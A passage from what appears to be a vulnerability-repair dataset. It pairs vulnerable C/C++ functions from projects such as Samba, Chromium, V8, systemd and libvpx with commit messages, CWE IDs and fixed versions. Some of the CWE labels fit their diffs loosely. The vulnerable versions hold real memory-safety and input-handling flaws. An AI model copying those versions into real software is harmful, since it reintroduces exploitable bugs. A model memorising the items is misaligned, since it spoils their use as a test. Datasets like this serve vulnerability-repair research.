ASN1_CONTEXT(8)); asn1_write_OctetString(data, tree->u.comparison.attr, strlen(tree->u.comparison.attr)); asn1_write_OctetString(data, tree->u.comparison.value.data, tree->u.comparison.value.length); asn1_pop_tag(data); break; case LDB_OP_EXTENDED: /* MatchingRuleAssertion ::= SEQUENCE { matchingRule [1] MatchingRuleID OPTIONAL, type [2] AttributeDescription OPTIONAL, matchValue [3] AssertionValue, dnAttributes [4] BOOLEAN DEFAULT FALSE } */ asn1_push_tag(data, ASN1_CONTEXT(9)); if (tree->u.extended.rule_id) { asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(1)); asn1_write_LDAPString(data, tree->u.extended.rule_id); asn1_pop_tag(data); } if (tree->u.extended.attr) { asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(2)); asn1_write_LDAPString(data, tree->u.extended.attr); asn1_pop_tag(data); } asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(3)); asn1_write_DATA_BLOB_LDAPString(data, &tree->u.extended.value); asn1_pop_tag(data); asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(4)); asn1_write_uint8(data, tree->u.extended.dnAttributes); asn1_pop_tag(data); asn1_pop_tag(data); break; default: return false; } return !data->has_error; } Commit Message: CWE ID: CWE-399
static bool ldap_push_filter(struct asn1_data *data, struct ldb_parse_tree *tree) { int i; switch (tree->operation) { case LDB_OP_AND: case LDB_OP_OR: if (!asn1_push_tag(data, ASN1_CONTEXT(tree->operation==LDB_OP_AND?0:1))) return false; for (i=0; i<tree->u.list.num_elements; i++) { if (!ldap_push_filter(data, tree->u.list.elements[i])) { return false; } } if (!asn1_pop_tag(data)) return false; break; case LDB_OP_NOT: if (!asn1_push_tag(data, ASN1_CONTEXT(2))) return false; if (!ldap_push_filter(data, tree->u.isnot.child)) { return false; } if (!asn1_pop_tag(data)) return false; break; case LDB_OP_EQUALITY: /* equality test */ if (!asn1_push_tag(data, ASN1_CONTEXT(3))) return false; if (!asn1_write_OctetString(data, tree->u.equality.attr, strlen(tree->u.equality.attr))) return false; if (!asn1_write_OctetString(data, tree->u.equality.value.data, tree->u.equality.value.length)) return false; if (!asn1_pop_tag(data)) return false; break; case LDB_OP_SUBSTRING: /* SubstringFilter ::= SEQUENCE { type AttributeDescription, -- at least one must be present substrings SEQUENCE OF CHOICE { initial [0] LDAPString, any [1] LDAPString, final [2] LDAPString } } */ if (!asn1_push_tag(data, ASN1_CONTEXT(4))) return false; if (!asn1_write_OctetString(data, tree->u.substring.attr, strlen(tree->u.substring.attr))) return false; if (!asn1_push_tag(data, ASN1_SEQUENCE(0))) return false; if (tree->u.substring.chunks && tree->u.substring.chunks[0]) { i = 0; if (!tree->u.substring.start_with_wildcard) { if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(0))) return false; if (!asn1_write_DATA_BLOB_LDAPString(data, tree->u.substring.chunks[i])) return false; if (!asn1_pop_tag(data)) return false; i++; } while (tree->u.substring.chunks[i]) { int ctx; if (( ! tree->u.substring.chunks[i + 1]) && (tree->u.substring.end_with_wildcard == 0)) { ctx = 2; } else { ctx = 1; } if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(ctx))) return false; if (!asn1_write_DATA_BLOB_LDAPString(data, tree->u.substring.chunks[i])) return false; if (!asn1_pop_tag(data)) return false; i++; } } if (!asn1_pop_tag(data)) return false; if (!asn1_pop_tag(data)) return false; break; case LDB_OP_GREATER: /* greaterOrEqual test */ if (!asn1_push_tag(data, ASN1_CONTEXT(5))) return false; if (!asn1_write_OctetString(data, tree->u.comparison.attr, strlen(tree->u.comparison.attr))) return false; if (!asn1_write_OctetString(data, tree->u.comparison.value.data, tree->u.comparison.value.length)) return false; if (!asn1_pop_tag(data)) return false; break; case LDB_OP_LESS: /* lessOrEqual test */ if (!asn1_push_tag(data, ASN1_CONTEXT(6))) return false; if (!asn1_write_OctetString(data, tree->u.comparison.attr, strlen(tree->u.comparison.attr))) return false; if (!asn1_write_OctetString(data, tree->u.comparison.value.data, tree->u.comparison.value.length)) return false; if (!asn1_pop_tag(data)) return false; break; case LDB_OP_PRESENT: /* present test */ if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(7))) return false; if (!asn1_write_LDAPString(data, tree->u.present.attr)) return false; if (!asn1_pop_tag(data)) return false; return !data->has_error; case LDB_OP_APPROX: /* approx test */ if (!asn1_push_tag(data, ASN1_CONTEXT(8))) return false; if (!asn1_write_OctetString(data, tree->u.comparison.attr, strlen(tree->u.comparison.attr))) return false; if (!asn1_write_OctetString(data, tree->u.comparison.value.data, tree->u.comparison.value.length)) return false; if (!asn1_pop_tag(data)) return false; break; case LDB_OP_EXTENDED: /* MatchingRuleAssertion ::= SEQUENCE { matchingRule [1] MatchingRuleID OPTIONAL, type [2] AttributeDescription OPTIONAL, matchValue [3] AssertionValue, dnAttributes [4] BOOLEAN DEFAULT FALSE } */ if (!asn1_push_tag(data, ASN1_CONTEXT(9))) return false; if (tree->u.extended.rule_id) { if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(1))) return false; if (!asn1_write_LDAPString(data, tree->u.extended.rule_id)) return false; if (!asn1_pop_tag(data)) return false; } if (tree->u.extended.attr) { if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(2))) return false; if (!asn1_write_LDAPString(data, tree->u.extended.attr)) return false; if (!asn1_pop_tag(data)) return false; } if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(3))) return false; if (!asn1_write_DATA_BLOB_LDAPString(data, &tree->u.extended.value)) return false; if (!asn1_pop_tag(data)) return false; if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(4))) return false; if (!asn1_write_uint8(data, tree->u.extended.dnAttributes)) return false; if (!asn1_pop_tag(data)) return false; if (!asn1_pop_tag(data)) return false; break; default: return false; } return !data->has_error; }
164,594
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void PixelBufferRasterWorkerPool::ScheduleMoreTasks() { TRACE_EVENT0("cc", "PixelBufferRasterWorkerPool::ScheduleMoreTasks"); enum RasterTaskType { PREPAINT_TYPE = 0, REQUIRED_FOR_ACTIVATION_TYPE = 1, NUM_TYPES = 2 }; NodeVector tasks[NUM_TYPES]; unsigned priority = 2u; // 0-1 reserved for RasterFinished tasks. TaskGraph graph; size_t bytes_pending_upload = bytes_pending_upload_; bool did_throttle_raster_tasks = false; for (RasterTaskVector::const_iterator it = raster_tasks().begin(); it != raster_tasks().end(); ++it) { internal::RasterWorkerPoolTask* task = it->get(); TaskMap::iterator pixel_buffer_it = pixel_buffer_tasks_.find(task); if (pixel_buffer_it == pixel_buffer_tasks_.end()) continue; if (task->HasFinishedRunning()) { DCHECK(std::find(completed_tasks_.begin(), completed_tasks_.end(), task) != completed_tasks_.end()); continue; } size_t new_bytes_pending_upload = bytes_pending_upload; new_bytes_pending_upload += task->resource()->bytes(); if (new_bytes_pending_upload > max_bytes_pending_upload_) { did_throttle_raster_tasks = true; break; } internal::WorkerPoolTask* pixel_buffer_task = pixel_buffer_it->second.get(); if (pixel_buffer_task && pixel_buffer_task->HasCompleted()) { bytes_pending_upload = new_bytes_pending_upload; continue; } size_t scheduled_raster_task_count = tasks[PREPAINT_TYPE].container().size() + tasks[REQUIRED_FOR_ACTIVATION_TYPE].container().size(); if (scheduled_raster_task_count >= kMaxScheduledRasterTasks) { did_throttle_raster_tasks = true; break; } bytes_pending_upload = new_bytes_pending_upload; RasterTaskType type = IsRasterTaskRequiredForActivation(task) ? REQUIRED_FOR_ACTIVATION_TYPE : PREPAINT_TYPE; if (pixel_buffer_task) { tasks[type].container().push_back( CreateGraphNodeForRasterTask(pixel_buffer_task, task->dependencies(), priority++, &graph)); continue; } resource_provider()->AcquirePixelBuffer(task->resource()->id()); uint8* buffer = resource_provider()->MapPixelBuffer( task->resource()->id()); scoped_refptr<internal::WorkerPoolTask> new_pixel_buffer_task( new PixelBufferWorkerPoolTaskImpl( task, buffer, base::Bind(&PixelBufferRasterWorkerPool::OnRasterTaskCompleted, base::Unretained(this), make_scoped_refptr(task)))); pixel_buffer_tasks_[task] = new_pixel_buffer_task; tasks[type].container().push_back( CreateGraphNodeForRasterTask(new_pixel_buffer_task.get(), task->dependencies(), priority++, &graph)); } scoped_refptr<internal::WorkerPoolTask> new_raster_required_for_activation_finished_task; size_t scheduled_raster_task_required_for_activation_count = tasks[REQUIRED_FOR_ACTIVATION_TYPE].container().size(); DCHECK_LE(scheduled_raster_task_required_for_activation_count, tasks_required_for_activation_.size()); if (scheduled_raster_task_required_for_activation_count == tasks_required_for_activation_.size() && should_notify_client_if_no_tasks_required_for_activation_are_pending_) { new_raster_required_for_activation_finished_task = CreateRasterRequiredForActivationFinishedTask(); internal::GraphNode* raster_required_for_activation_finished_node = CreateGraphNodeForTask( new_raster_required_for_activation_finished_task.get(), 0u, // Priority 0 &graph); AddDependenciesToGraphNode( raster_required_for_activation_finished_node, tasks[REQUIRED_FOR_ACTIVATION_TYPE].container()); } scoped_refptr<internal::WorkerPoolTask> new_raster_finished_task; size_t scheduled_raster_task_count = tasks[PREPAINT_TYPE].container().size() + tasks[REQUIRED_FOR_ACTIVATION_TYPE].container().size(); DCHECK_LE(scheduled_raster_task_count, PendingRasterTaskCount()); if (!did_throttle_raster_tasks && should_notify_client_if_no_tasks_are_pending_) { new_raster_finished_task = CreateRasterFinishedTask(); internal::GraphNode* raster_finished_node = CreateGraphNodeForTask(new_raster_finished_task.get(), 1u, // Priority 1 &graph); for (unsigned type = 0; type < NUM_TYPES; ++type) { AddDependenciesToGraphNode( raster_finished_node, tasks[type].container()); } } SetTaskGraph(&graph); scheduled_raster_task_count_ = scheduled_raster_task_count; set_raster_finished_task(new_raster_finished_task); set_raster_required_for_activation_finished_task( new_raster_required_for_activation_finished_task); } Commit Message: cc: Simplify raster task completion notification logic (Relanding after missing activation bug fixed in https://codereview.chromium.org/131763003/) Previously the pixel buffer raster worker pool used a combination of polling and explicit notifications from the raster worker pool to decide when to tell the client about the completion of 1) all tasks or 2) the subset of tasks required for activation. This patch simplifies the logic by only triggering the notification based on the OnRasterTasksFinished and OnRasterTasksRequiredForActivationFinished calls from the worker pool. BUG=307841,331534 Review URL: https://codereview.chromium.org/99873007 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@243991 0039d316-1c4b-4281-b951-d872f2087c98 CWE ID: CWE-20
void PixelBufferRasterWorkerPool::ScheduleMoreTasks() { TRACE_EVENT0("cc", "PixelBufferRasterWorkerPool::ScheduleMoreTasks"); enum RasterTaskType { PREPAINT_TYPE = 0, REQUIRED_FOR_ACTIVATION_TYPE = 1, NUM_TYPES = 2 }; NodeVector tasks[NUM_TYPES]; unsigned priority = 2u; // 0-1 reserved for RasterFinished tasks. TaskGraph graph; size_t bytes_pending_upload = bytes_pending_upload_; bool did_throttle_raster_tasks = false; for (RasterTaskVector::const_iterator it = raster_tasks().begin(); it != raster_tasks().end(); ++it) { internal::RasterWorkerPoolTask* task = it->get(); TaskMap::iterator pixel_buffer_it = pixel_buffer_tasks_.find(task); if (pixel_buffer_it == pixel_buffer_tasks_.end()) continue; if (task->HasFinishedRunning()) { DCHECK(std::find(completed_tasks_.begin(), completed_tasks_.end(), task) != completed_tasks_.end()); continue; } size_t new_bytes_pending_upload = bytes_pending_upload; new_bytes_pending_upload += task->resource()->bytes(); if (new_bytes_pending_upload > max_bytes_pending_upload_) { did_throttle_raster_tasks = true; break; } internal::WorkerPoolTask* pixel_buffer_task = pixel_buffer_it->second.get(); if (pixel_buffer_task && pixel_buffer_task->HasCompleted()) { bytes_pending_upload = new_bytes_pending_upload; continue; } size_t scheduled_raster_task_count = tasks[PREPAINT_TYPE].container().size() + tasks[REQUIRED_FOR_ACTIVATION_TYPE].container().size(); if (scheduled_raster_task_count >= kMaxScheduledRasterTasks) { did_throttle_raster_tasks = true; break; } bytes_pending_upload = new_bytes_pending_upload; RasterTaskType type = IsRasterTaskRequiredForActivation(task) ? REQUIRED_FOR_ACTIVATION_TYPE : PREPAINT_TYPE; if (pixel_buffer_task) { tasks[type].container().push_back( CreateGraphNodeForRasterTask(pixel_buffer_task, task->dependencies(), priority++, &graph)); continue; } resource_provider()->AcquirePixelBuffer(task->resource()->id()); uint8* buffer = resource_provider()->MapPixelBuffer( task->resource()->id()); scoped_refptr<internal::WorkerPoolTask> new_pixel_buffer_task( new PixelBufferWorkerPoolTaskImpl( task, buffer, base::Bind(&PixelBufferRasterWorkerPool::OnRasterTaskCompleted, base::Unretained(this), make_scoped_refptr(task)))); pixel_buffer_tasks_[task] = new_pixel_buffer_task; tasks[type].container().push_back( CreateGraphNodeForRasterTask(new_pixel_buffer_task.get(), task->dependencies(), priority++, &graph)); } scoped_refptr<internal::WorkerPoolTask> new_raster_required_for_activation_finished_task; size_t scheduled_raster_task_required_for_activation_count = tasks[REQUIRED_FOR_ACTIVATION_TYPE].container().size(); DCHECK_LE(scheduled_raster_task_required_for_activation_count, tasks_required_for_activation_.size()); if (scheduled_raster_task_required_for_activation_count == tasks_required_for_activation_.size() && should_notify_client_if_no_tasks_required_for_activation_are_pending_) { new_raster_required_for_activation_finished_task = CreateRasterRequiredForActivationFinishedTask(); raster_required_for_activation_finished_task_pending_ = true; internal::GraphNode* raster_required_for_activation_finished_node = CreateGraphNodeForTask( new_raster_required_for_activation_finished_task.get(), 0u, // Priority 0 &graph); AddDependenciesToGraphNode( raster_required_for_activation_finished_node, tasks[REQUIRED_FOR_ACTIVATION_TYPE].container()); } scoped_refptr<internal::WorkerPoolTask> new_raster_finished_task; size_t scheduled_raster_task_count = tasks[PREPAINT_TYPE].container().size() + tasks[REQUIRED_FOR_ACTIVATION_TYPE].container().size(); DCHECK_LE(scheduled_raster_task_count, PendingRasterTaskCount()); if (!did_throttle_raster_tasks && should_notify_client_if_no_tasks_are_pending_) { new_raster_finished_task = CreateRasterFinishedTask(); raster_finished_task_pending_ = true; internal::GraphNode* raster_finished_node = CreateGraphNodeForTask(new_raster_finished_task.get(), 1u, // Priority 1 &graph); for (unsigned type = 0; type < NUM_TYPES; ++type) { AddDependenciesToGraphNode( raster_finished_node, tasks[type].container()); } } SetTaskGraph(&graph); scheduled_raster_task_count_ = scheduled_raster_task_count; set_raster_finished_task(new_raster_finished_task); set_raster_required_for_activation_finished_task( new_raster_required_for_activation_finished_task); }
171,263
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static Maybe<int64_t> IndexOfValueImpl(Isolate* isolate, Handle<JSObject> object, Handle<Object> value, uint32_t start_from, uint32_t length) { DCHECK(JSObject::PrototypeHasNoElements(isolate, *object)); Handle<Map> original_map = handle(object->map(), isolate); Handle<FixedArray> parameter_map(FixedArray::cast(object->elements()), isolate); for (uint32_t k = start_from; k < length; ++k) { uint32_t entry = GetEntryForIndexImpl(isolate, *object, *parameter_map, k, ALL_PROPERTIES); if (entry == kMaxUInt32) { continue; } Handle<Object> element_k = Subclass::GetImpl(isolate, *parameter_map, entry); if (element_k->IsAccessorPair()) { LookupIterator it(isolate, object, k, LookupIterator::OWN); DCHECK(it.IsFound()); DCHECK_EQ(it.state(), LookupIterator::ACCESSOR); ASSIGN_RETURN_ON_EXCEPTION_VALUE(isolate, element_k, Object::GetPropertyWithAccessor(&it), Nothing<int64_t>()); if (value->StrictEquals(*element_k)) { return Just<int64_t>(k); } if (object->map() != *original_map) { return IndexOfValueSlowPath(isolate, object, value, k + 1, length); } } else if (value->StrictEquals(*element_k)) { return Just<int64_t>(k); } } return Just<int64_t>(-1); } Commit Message: Backport: Fix Object.entries/values with changing elements Bug: 111274046 Test: m -j proxy_resolver_v8_unittest && adb sync && adb shell \ /data/nativetest64/proxy_resolver_v8_unittest/proxy_resolver_v8_unittest Change-Id: I705fc512cc5837e9364ed187559cc75d079aa5cb (cherry picked from commit d8be9a10287afed07705ac8af027d6a46d4def99) CWE ID: CWE-704
static Maybe<int64_t> IndexOfValueImpl(Isolate* isolate, Handle<JSObject> object, Handle<Object> value, uint32_t start_from, uint32_t length) { DCHECK(JSObject::PrototypeHasNoElements(isolate, *object)); Handle<Map> original_map(object->map(), isolate); Handle<FixedArray> parameter_map(FixedArray::cast(object->elements()), isolate); for (uint32_t k = start_from; k < length; ++k) { DCHECK_EQ(object->map(), *original_map); uint32_t entry = GetEntryForIndexImpl(isolate, *object, *parameter_map, k, ALL_PROPERTIES); if (entry == kMaxUInt32) { continue; } Handle<Object> element_k = Subclass::GetImpl(isolate, *parameter_map, entry); if (element_k->IsAccessorPair()) { LookupIterator it(isolate, object, k, LookupIterator::OWN); DCHECK(it.IsFound()); DCHECK_EQ(it.state(), LookupIterator::ACCESSOR); ASSIGN_RETURN_ON_EXCEPTION_VALUE(isolate, element_k, Object::GetPropertyWithAccessor(&it), Nothing<int64_t>()); if (value->StrictEquals(*element_k)) { return Just<int64_t>(k); } if (object->map() != *original_map) { return IndexOfValueSlowPath(isolate, object, value, k + 1, length); } } else if (value->StrictEquals(*element_k)) { return Just<int64_t>(k); } } return Just<int64_t>(-1); }
174,099
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void NetworkHandler::GetCookies(Maybe<Array<String>> protocol_urls, std::unique_ptr<GetCookiesCallback> callback) { if (!host_) { callback->sendFailure(Response::InternalError()); return; } std::vector<GURL> urls = ComputeCookieURLs(host_, protocol_urls); scoped_refptr<CookieRetriever> retriever = new CookieRetriever(std::move(callback)); BrowserThread::PostTask( BrowserThread::IO, FROM_HERE, base::BindOnce( &CookieRetriever::RetrieveCookiesOnIO, retriever, base::Unretained( process_->GetStoragePartition()->GetURLRequestContext()), urls)); } Commit Message: DevTools: speculative fix for crash in NetworkHandler::Disable This keeps BrowserContext* and StoragePartition* instead of RenderProcessHost* in an attemp to resolve UAF of RenderProcessHost upon closure of DevTools front-end. Bug: 801117, 783067, 780694 Change-Id: I6c2cca60cc0c29f0949d189cf918769059f80c1b Reviewed-on: https://chromium-review.googlesource.com/876657 Commit-Queue: Andrey Kosyakov <caseq@chromium.org> Reviewed-by: Dmitry Gozman <dgozman@chromium.org> Cr-Commit-Position: refs/heads/master@{#531157} CWE ID: CWE-20
void NetworkHandler::GetCookies(Maybe<Array<String>> protocol_urls, std::unique_ptr<GetCookiesCallback> callback) { if (!host_) { callback->sendFailure(Response::InternalError()); return; } std::vector<GURL> urls = ComputeCookieURLs(host_, protocol_urls); scoped_refptr<CookieRetriever> retriever = new CookieRetriever(std::move(callback)); BrowserThread::PostTask( BrowserThread::IO, FROM_HERE, base::BindOnce( &CookieRetriever::RetrieveCookiesOnIO, retriever, base::Unretained(storage_partition_->GetURLRequestContext()), urls)); }
172,757
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: InProcessBrowserTest::InProcessBrowserTest() : browser_(NULL), exit_when_last_browser_closes_(true), multi_desktop_test_(false) #if defined(OS_MACOSX) , autorelease_pool_(NULL) #endif // OS_MACOSX { #if defined(OS_MACOSX) base::FilePath chrome_path; CHECK(PathService::Get(base::FILE_EXE, &chrome_path)); chrome_path = chrome_path.DirName(); chrome_path = chrome_path.Append(chrome::kBrowserProcessExecutablePath); CHECK(PathService::Override(base::FILE_EXE, chrome_path)); #endif // defined(OS_MACOSX) CreateTestServer(base::FilePath(FILE_PATH_LITERAL("chrome/test/data"))); base::FilePath src_dir; CHECK(PathService::Get(base::DIR_SOURCE_ROOT, &src_dir)); base::FilePath test_data_dir = src_dir.AppendASCII("chrome/test/data"); embedded_test_server()->ServeFilesFromDirectory(test_data_dir); CHECK(PathService::Override(chrome::DIR_TEST_DATA, test_data_dir)); } Commit Message: Make the policy fetch for first time login blocking The CL makes policy fetching for first time login blocking for all users, except the ones that are known to be non-enterprise users. BUG=334584 Review URL: https://codereview.chromium.org/330843002 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@282925 0039d316-1c4b-4281-b951-d872f2087c98 CWE ID: CWE-119
InProcessBrowserTest::InProcessBrowserTest() : browser_(NULL), exit_when_last_browser_closes_(true), open_about_blank_on_browser_launch_(true), multi_desktop_test_(false) #if defined(OS_MACOSX) , autorelease_pool_(NULL) #endif // OS_MACOSX { #if defined(OS_MACOSX) base::FilePath chrome_path; CHECK(PathService::Get(base::FILE_EXE, &chrome_path)); chrome_path = chrome_path.DirName(); chrome_path = chrome_path.Append(chrome::kBrowserProcessExecutablePath); CHECK(PathService::Override(base::FILE_EXE, chrome_path)); #endif // defined(OS_MACOSX) CreateTestServer(base::FilePath(FILE_PATH_LITERAL("chrome/test/data"))); base::FilePath src_dir; CHECK(PathService::Get(base::DIR_SOURCE_ROOT, &src_dir)); base::FilePath test_data_dir = src_dir.AppendASCII("chrome/test/data"); embedded_test_server()->ServeFilesFromDirectory(test_data_dir); CHECK(PathService::Override(chrome::DIR_TEST_DATA, test_data_dir)); }
171,151
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: receive_carbon(void **state) { prof_input("/carbons on"); prof_connect(); assert_true(stbbr_received( "<iq id='*' type='set'><enable xmlns='urn:xmpp:carbons:2'/></iq>" )); stbbr_send( "<presence to='stabber@localhost' from='buddy1@localhost/mobile'>" "<priority>10</priority>" "<status>On my mobile</status>" "</presence>" ); assert_true(prof_output_exact("Buddy1 (mobile) is online, \"On my mobile\"")); prof_input("/msg Buddy1"); assert_true(prof_output_exact("unencrypted")); stbbr_send( "<message type='chat' to='stabber@localhost/profanity' from='buddy1@localhost'>" "<received xmlns='urn:xmpp:carbons:2'>" "<forwarded xmlns='urn:xmpp:forward:0'>" "<message id='prof_msg_7' xmlns='jabber:client' type='chat' lang='en' to='stabber@localhost/profanity' from='buddy1@localhost/mobile'>" "<body>test carbon from recipient</body>" "</message>" "</forwarded>" "</received>" "</message>" ); assert_true(prof_output_regex("Buddy1/mobile: .+test carbon from recipient")); } Commit Message: Add carbons from check CWE ID: CWE-346
receive_carbon(void **state) { prof_input("/carbons on"); prof_connect(); assert_true(stbbr_received( "<iq id='*' type='set'><enable xmlns='urn:xmpp:carbons:2'/></iq>" )); stbbr_send( "<presence to='stabber@localhost' from='buddy1@localhost/mobile'>" "<priority>10</priority>" "<status>On my mobile</status>" "</presence>" ); assert_true(prof_output_exact("Buddy1 (mobile) is online, \"On my mobile\"")); prof_input("/msg Buddy1"); assert_true(prof_output_exact("unencrypted")); stbbr_send( "<message type='chat' to='stabber@localhost/profanity' from='stabber@localhost'>" "<received xmlns='urn:xmpp:carbons:2'>" "<forwarded xmlns='urn:xmpp:forward:0'>" "<message id='prof_msg_7' xmlns='jabber:client' type='chat' lang='en' to='stabber@localhost/profanity' from='buddy1@localhost/mobile'>" "<body>test carbon from recipient</body>" "</message>" "</forwarded>" "</received>" "</message>" ); assert_true(prof_output_regex("Buddy1/mobile: .+test carbon from recipient")); }
168,383
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: int vt_reset_keyboard(int fd) { int kb; /* If we can't read the default, then default to unicode. It's 2017 after all. */ kb = vt_default_utf8() != 0 ? K_UNICODE : K_XLATE; if (ioctl(fd, KDSKBMODE, kb) < 0) return -errno; return 0; } Commit Message: Merge pull request #12378 from rbalint/vt-kbd-reset-check VT kbd reset check CWE ID: CWE-255
int vt_reset_keyboard(int fd) { int kb, r; /* If we can't read the default, then default to unicode. It's 2017 after all. */ kb = vt_default_utf8() != 0 ? K_UNICODE : K_XLATE; r = vt_verify_kbmode(fd); if (r == -EBUSY) { log_debug_errno(r, "Keyboard is not in XLATE or UNICODE mode, not resetting: %m"); return 0; } else if (r < 0) return r; if (ioctl(fd, KDSKBMODE, kb) < 0) return -errno; return 0; }
169,776
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void AudioNode::Dispose() { DCHECK(IsMainThread()); #if DEBUG_AUDIONODE_REFERENCES fprintf(stderr, "[%16p]: %16p: %2d: AudioNode::dispose %16p\n", context(), this, Handler().GetNodeType(), handler_.get()); #endif BaseAudioContext::GraphAutoLocker locker(context()); Handler().Dispose(); if (context()->HasRealtimeConstraint()) { context()->GetDeferredTaskHandler().AddRenderingOrphanHandler( std::move(handler_)); } else { if (context()->ContextState() == BaseAudioContext::kRunning) { context()->GetDeferredTaskHandler().AddRenderingOrphanHandler( std::move(handler_)); } } } Commit Message: Revert "Keep AudioHandlers alive until they can be safely deleted." This reverts commit 071df33edf2c8b4375fa432a83953359f93ea9e4. Reason for revert: This CL seems to cause an AudioNode leak on the Linux leak bot. The log is: https://ci.chromium.org/buildbot/chromium.webkit/WebKit%20Linux%20Trusty%20Leak/14252 * webaudio/AudioNode/audionode-connect-method-chaining.html * webaudio/Panner/pannernode-basic.html * webaudio/dom-exceptions.html Original change's description: > Keep AudioHandlers alive until they can be safely deleted. > > When an AudioNode is disposed, the handler is also disposed. But add > the handler to the orphan list so that the handler stays alive until > the context can safely delete it. If we don't do this, the handler > may get deleted while the audio thread is processing the handler (due > to, say, channel count changes and such). > > For an realtime context, always save the handler just in case the > audio thread is running after the context is marked as closed (because > the audio thread doesn't instantly stop when requested). > > For an offline context, only need to do this when the context is > running because the context is guaranteed to be stopped if we're not > in the running state. Hence, there's no possibility of deleting the > handler while the graph is running. > > This is a revert of > https://chromium-review.googlesource.com/c/chromium/src/+/860779, with > a fix for the leak. > > Bug: 780919 > Change-Id: Ifb6b5fcf3fbc373f5779256688731245771da33c > Reviewed-on: https://chromium-review.googlesource.com/862723 > Reviewed-by: Hongchan Choi <hongchan@chromium.org> > Commit-Queue: Raymond Toy <rtoy@chromium.org> > Cr-Commit-Position: refs/heads/master@{#528829} TBR=rtoy@chromium.org,hongchan@chromium.org Change-Id: Ibf406bf6ed34ea1f03e86a64a1e5ba6de0970c6f No-Presubmit: true No-Tree-Checks: true No-Try: true Bug: 780919 Reviewed-on: https://chromium-review.googlesource.com/863402 Reviewed-by: Taiju Tsuiki <tzik@chromium.org> Commit-Queue: Taiju Tsuiki <tzik@chromium.org> Cr-Commit-Position: refs/heads/master@{#528888} CWE ID: CWE-416
void AudioNode::Dispose() { DCHECK(IsMainThread()); #if DEBUG_AUDIONODE_REFERENCES fprintf(stderr, "[%16p]: %16p: %2d: AudioNode::dispose %16p\n", context(), this, Handler().GetNodeType(), handler_.get()); #endif BaseAudioContext::GraphAutoLocker locker(context()); Handler().Dispose(); if (context()->ContextState() == BaseAudioContext::kRunning) { context()->GetDeferredTaskHandler().AddRenderingOrphanHandler( std::move(handler_)); } }
172,795
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void RunMemCheck() { ACMRandom rnd(ACMRandom::DeterministicSeed()); const int count_test_block = 1000; DECLARE_ALIGNED_ARRAY(16, int16_t, input_block, kNumCoeffs); DECLARE_ALIGNED_ARRAY(16, int16_t, input_extreme_block, kNumCoeffs); DECLARE_ALIGNED_ARRAY(16, int16_t, output_ref_block, kNumCoeffs); DECLARE_ALIGNED_ARRAY(16, int16_t, output_block, kNumCoeffs); for (int i = 0; i < count_test_block; ++i) { for (int j = 0; j < kNumCoeffs; ++j) { input_block[j] = rnd.Rand8() - rnd.Rand8(); input_extreme_block[j] = rnd.Rand8() % 2 ? 255 : -255; } if (i == 0) for (int j = 0; j < kNumCoeffs; ++j) input_extreme_block[j] = 255; if (i == 1) for (int j = 0; j < kNumCoeffs; ++j) input_extreme_block[j] = -255; fwd_txfm_ref(input_extreme_block, output_ref_block, pitch_, tx_type_); REGISTER_STATE_CHECK(RunFwdTxfm(input_extreme_block, output_block, pitch_)); for (int j = 0; j < kNumCoeffs; ++j) { EXPECT_EQ(output_block[j], output_ref_block[j]); EXPECT_GE(4 * DCT_MAX_VALUE, abs(output_block[j])) << "Error: 16x16 FDCT has coefficient larger than 4*DCT_MAX_VALUE"; } } } Commit Message: Merge Conflict Fix CL to lmp-mr1-release for ag/849478 DO NOT MERGE - libvpx: Pull from upstream Current HEAD: 7105df53d7dc13d5e575bc8df714ec8d1da36b06 BUG=23452792 Change-Id: Ic78176fc369e0bacc71d423e0e2e6075d004aaec CWE ID: CWE-119
void RunMemCheck() { ACMRandom rnd(ACMRandom::DeterministicSeed()); const int count_test_block = 1000; DECLARE_ALIGNED(16, int16_t, input_extreme_block[kNumCoeffs]); DECLARE_ALIGNED(16, tran_low_t, output_ref_block[kNumCoeffs]); DECLARE_ALIGNED(16, tran_low_t, output_block[kNumCoeffs]); for (int i = 0; i < count_test_block; ++i) { // Initialize a test block with input range [-mask_, mask_]. for (int j = 0; j < kNumCoeffs; ++j) { input_extreme_block[j] = rnd.Rand8() % 2 ? mask_ : -mask_; } if (i == 0) { for (int j = 0; j < kNumCoeffs; ++j) input_extreme_block[j] = mask_; } else if (i == 1) { for (int j = 0; j < kNumCoeffs; ++j) input_extreme_block[j] = -mask_; } fwd_txfm_ref(input_extreme_block, output_ref_block, pitch_, tx_type_); ASM_REGISTER_STATE_CHECK(RunFwdTxfm(input_extreme_block, output_block, pitch_)); for (int j = 0; j < kNumCoeffs; ++j) { EXPECT_EQ(output_block[j], output_ref_block[j]); EXPECT_GE(4 * DCT_MAX_VALUE << (bit_depth_ - 8), abs(output_block[j])) << "Error: 16x16 FDCT has 